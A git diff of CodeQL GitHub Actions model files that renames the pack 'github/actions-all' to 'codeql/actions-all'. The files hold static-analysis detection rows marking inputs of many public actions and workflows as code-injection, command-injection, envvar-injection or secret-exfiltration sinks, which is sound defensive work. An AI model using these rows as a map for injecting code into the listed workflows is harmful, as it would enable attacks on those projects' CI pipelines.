+++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index ddce9773100..f2b4cd4eff3 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index 3aa599e00d7..f38f0d43c4c 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] 
@@ -8,7 +8,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index 4ff3377e6eb..85e61e866dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index 577ffa78d82..9f984f488f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index 99ff06a4aee..f13f9b87114 100644 
--- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 5241bc1bcb1..b021069745f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 66221185cbd..dae9a68727e 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index eb5207528d4..4ea3849560d 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index 1337b0e76ec..ff4b4ccf353 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index 1d8b8f0e9f1..d3649a5ebf3 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index 4eaa610a3a2..22ff2d5a29b 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index a62139e12c4..f151d0a2c20 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index 2f3f85fe424..e08f9de2297 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index f39a027eda7..fc009bce95a 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index 5a0b692e4e1..5e5870c64c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index ae902cb95ab..2262cf5115f 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 78379dd7796..a18ef96e87e 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 0eeed9a1f17..2ea0842c72b 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index 3ab501e1b1f..65f027175b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index caa0ee6d7cb..14c3c8378c6 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index b660b0bc4ec..c1a51cefdcd 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 0fe5470bb11..c9b7394f044 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index a9cd5759cf2..36c50c6ad50 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 5b0dc5da53d..fc0607380ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index c90d1ac8afb..122a61c76fb 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index 8d68efb9247..26ff1b8d07c 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"]
diff --git a/ql/lib/ext/manual/8398a7_action-slack.model.yml b/ql/lib/ext/manual/8398a7_action-slack.model.yml
index 5687a9729fc..62ffad94493 100644
--- a/ql/lib/ext/manual/8398a7_action-slack.model.yml
+++ b/ql/lib/ext/manual/8398a7_action-slack.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml
index 2efaefb95b6..d09b5bf0085 100644
--- a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml
+++ b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["AsasInnab/regex-action", "*", "input.search_string", "output.first_match", "taint", "manual"]
diff --git a/ql/lib/ext/manual/MeilCli_regex-match.model.yml b/ql/lib/ext/manual/MeilCli_regex-match.model.yml
index 74a0f43fd91..45a4441e5ca 100644
--- a/ql/lib/ext/manual/MeilCli_regex-match.model.yml
+++ b/ql/lib/ext/manual/MeilCli_regex-match.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_first", "taint", "manual"]
diff --git a/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml
index 87620afac70..2f38a258867 100644
--- a/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml
+++ b/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"]
diff --git a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml
index ad7fb8a538c..ba894b15732 100644
--- a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml
+++ b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["Steph0/dotenv-configserver", "*", "input.repository", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml
index e2009c88851..a29b008f6c2 100644
--- a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml
+++ b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/WyriHaximus/github-action-files-in-commit
diff --git a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml
index cf23452f7a9..045e1177ae2 100644
--- a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml
+++ b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["aarcangeli/load-dotenv", "*", "artifact", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml
index 119b4b1d814..011f078ff68 100644
--- a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml
+++ b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/ab185508/file-type-finder
diff --git a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml
index edc9585b548..ea86e6f5ec7 100644
--- a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml
+++ b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["actions-ecosystem/action-regex-match", "*", "input.text", "output.*", "taint", "manual"]
diff --git a/ql/lib/ext/manual/actions_github-script.model.yml b/ql/lib/ext/manual/actions_github-script.model.yml
index f02d8f5b180..3033719bc3b 100644
--- a/ql/lib/ext/manual/actions_github-script.model.yml
+++ b/ql/lib/ext/manual/actions_github-script.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["actions/github-script", "*", "input.script", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml
index 77df62717b0..f245519a061 100644
--- a/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml
+++ b/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"]
diff --git a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml
index 8f14138168c..0116f070183 100644
--- a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml
+++ b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["akefirad/loadenv-action", "*", "artifact", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml
index abdcdd6d698..c272955c58e 100644
--- a/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml
+++ b/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
index 86ce17a9a9b..5523b7c5067 100644
--- a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
+++ b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["alessbell/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"]
diff --git a/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml
index ecfdbfb98a0..8d49c5436e6 100644
--- a/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml
+++ b/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"]
diff --git a/ql/lib/ext/manual/anchore_sbom-action.model.yml b/ql/lib/ext/manual/anchore_sbom-action.model.yml
index ea7ab312528..d607aee0514 100644
--- a/ql/lib/ext/manual/anchore_sbom-action.model.yml
+++ b/ql/lib/ext/manual/anchore_sbom-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/anchore_scan-action.model.yml b/ql/lib/ext/manual/anchore_scan-action.model.yml
index 21ea405b32c..93bfef22269 100644
--- a/ql/lib/ext/manual/anchore_scan-action.model.yml
+++ b/ql/lib/ext/manual/anchore_scan-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/andresz1_size-limit-action.model.yml b/ql/lib/ext/manual/andresz1_size-limit-action.model.yml
index 1e95a8c0273..84500597ce2 100644
--- a/ql/lib/ext/manual/andresz1_size-limit-action.model.yml
+++ b/ql/lib/ext/manual/andresz1_size-limit-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/android-actions_setup-android.model.yml b/ql/lib/ext/manual/android-actions_setup-android.model.yml
index 1ecba6ef1a1..3db7aa5db2c 100644
--- a/ql/lib/ext/manual/android-actions_setup-android.model.yml
+++ b/ql/lib/ext/manual/android-actions_setup-android.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"]
diff --git a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml
index e3c9297cf23..ac01c86d587 100644
--- a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml
+++ b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/ankitjain28may/list-files-in-pr
diff --git a/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml
index 5d7cb6e0b91..47411f7342a 100644
--- a/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml
+++ b/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"]
diff --git a/ql/lib/ext/manual/appleboy_ssh-action.model.yml b/ql/lib/ext/manual/appleboy_ssh-action.model.yml
index c489f8edc85..087045d86b4 100644
--- a/ql/lib/ext/manual/appleboy_ssh-action.model.yml
+++ b/ql/lib/ext/manual/appleboy_ssh-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["appleboy/ssh-action", "*", "input.script", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/asdf-vm_actions.model.yml b/ql/lib/ext/manual/asdf-vm_actions.model.yml
index 26b2e2eb693..29276b6fdd4 100644
--- a/ql/lib/ext/manual/asdf-vm_actions.model.yml
+++ b/ql/lib/ext/manual/asdf-vm_actions.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml
index 99324837e75..db6c52b33fd 100644
--- a/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml
+++ b/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml
